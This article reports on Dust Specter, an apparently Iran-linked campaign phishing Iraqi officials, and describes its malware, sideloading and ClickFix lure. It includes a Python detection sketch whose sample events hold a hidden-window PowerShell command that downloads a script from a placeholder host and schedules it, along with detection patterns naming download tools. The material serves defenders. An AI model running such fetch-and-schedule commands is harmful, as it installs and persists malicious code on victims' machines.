# Dust Specter: A New APT Campaign Targeting Iraqi Officials with Sophisticated Malware
In a recent campaign by Iran-linked group Dust Specter, hackers have been targeting Iraqi government officials with phishing emails delivering new malware families. Zscaler ThreatLabz researchers have linked the Iran-nexus group to this operation, which uses sophisticated tactics, techniques, and procedures (TTPs) to evade detection.
The campaign, which began in January 2026, saw Dust Specter impersonate Iraq's Ministry of Foreign Affairs in phishing messages that delivered previously unseen malware families, including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The attackers used multiple infection chains to deliver the malware, making it harder for victims to detect and remove the threats. Zscaler ThreatLabz assesses with medium-to-high confidence that an Iran-nexus threat actor conducted the operation.
One attack chain used in the campaign began with a password-protected archive containing a dropper named SPLITDROP, disguised as a WinRAR application. Once executed, it decrypted and deployed two modules: TWINTASK, a worker component that executes PowerShell commands from a local file, and TWINTALK, a command-and-control (C2) orchestrator. TWINTALK communicates with the C2 server using randomized delays, custom URI paths, and JWT tokens to evade detection.
The malware establishes persistence through registry keys and uses DLL sideloading with legitimate software such as VLC and WingetUI. It also opens a fake Google Form posing as a survey from Iraq's Ministry of Foreign Affairs to lure victims. The campaign also used a ClickFix lure disguised as a Cisco Webex meeting page to trick victims into running malicious PowerShell commands that download and schedule malware execution.
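As an added illustration (not code from the Zscaler report or this article), the following Python sketch runs two defender-side heuristics over constructed, Sysmon-style events: a ClickFix-shaped PowerShell launch that both downloads content and registers a scheduled task, and a VLC or WingetUI host binary loading a DLL from a user-writable directory. The event field names, the explorer.exe parent heuristic, and the sample paths are assumptions.

```python
import re

# Constructed Sysmon-style process-creation (EID 1) and image-load (EID 7)
# events; the field names are a simplified assumption, not a real log schema.
SAMPLE_EVENTS = [
    {"eid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",   # Run-dialog launch, typical of ClickFix
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/a.ps1 -o $env:TEMP\\a.ps1; '
                'schtasks /create /sc minute /mo 5 /tn Updater /tr $env:TEMP\\a.ps1"'},
    {"eid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Git\cmd\git.exe",
     "cmdline": "powershell -File build.ps1"},   # benign developer use
    {"eid": 7, "image": r"C:\Users\user\AppData\Local\Temp\vlc\vlc.exe",
     "loaded": r"C:\Users\user\AppData\Local\Temp\vlc\libvlccore.dll"},
    {"eid": 7, "image": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
     "loaded": r"C:\Program Files\VideoLAN\VLC\libvlccore.dll"},   # normal install
]

DOWNLOAD = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)", re.I)
SCHEDULE = re.compile(r"(schtasks(\.exe)?\s+/create|register-scheduledtask)", re.I)
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(appdata|downloads)|temp|programdata)\\", re.I)
SIDELOAD_HOSTS = ("vlc.exe", "wingetui.exe")   # legitimate hosts named in the report


def is_clickfix_chain(ev):
    """PowerShell spawned by the shell whose single command line both fetches
    content and registers a scheduled task, the pattern a ClickFix lure produces."""
    if ev.get("eid") != 1 or not ev["image"].lower().endswith("powershell.exe"):
        return False
    if not ev["parent"].lower().endswith("explorer.exe"):
        return False
    return bool(DOWNLOAD.search(ev["cmdline"]) and SCHEDULE.search(ev["cmdline"]))


def is_suspicious_sideload(ev):
    """A known sideload host loading a DLL from a user-writable directory
    instead of its install directory."""
    if ev.get("eid") != 7:
        return False
    host = ev["image"].rsplit("\\", 1)[-1].lower()
    return host in SIDELOAD_HOSTS and bool(USER_WRITABLE.search(ev["loaded"]))


def triage(events):
    """Return (rule_name, event_index) pairs for every event a rule matched."""
    hits = []
    for i, ev in enumerate(events):
        if is_clickfix_chain(ev):
            hits.append(("clickfix_powershell_chain", i))
        if is_suspicious_sideload(ev):
            hits.append(("sideload_from_user_dir", i))
    return hits


if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_EVENTS):
        print(f"{rule}: {SAMPLE_EVENTS[idx]['image']}")
```

Both rules are deliberately narrow; in production they would be joined with the report's indicators and tuned against the environment's normal PowerShell and installer activity.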
ThreatLabz researchers found indicators that generative AI may have been used to develop the TWINTALK and GHOSTFORM malware, including unusual elements such as emojis and Unicode text embedded in functions. The campaign also shares similarities with previous Iranian cyber-espionage operations, suggesting that Dust Specter is a sophisticated APT group.
The use of phishing emails and convincing social engineering lures impersonating Iraq's Ministry of Foreign Affairs highlights the human element of cybersecurity threats. It is essential for organizations to educate their employees on how to identify and report suspicious emails, as well as implement robust security measures to prevent similar attacks in the future.
In conclusion, this campaign demonstrates the growing sophistication of APT groups and the need for organizations to stay vigilant against advanced cyber threats. By understanding the tactics and techniques used by threat actors like Dust Specter, we can better protect ourselves against similar attacks in the future.
Keywords: Dust Specter, Iran-nexus, APT, malware, phishing, cybersecurity, threat actor, ClickFix, generative AI